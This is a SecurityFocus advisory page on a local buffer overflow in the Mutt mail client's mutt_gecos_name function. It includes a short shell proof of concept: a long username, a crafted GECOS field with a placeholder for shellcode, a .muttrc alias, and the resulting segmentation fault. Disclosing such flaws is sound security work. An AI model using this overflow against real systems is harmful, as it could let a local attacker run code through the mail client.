Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Mutt Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability

The following proof of concept is available:

# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)







 

Privacy Statement
Copyright 2009, SecurityFocus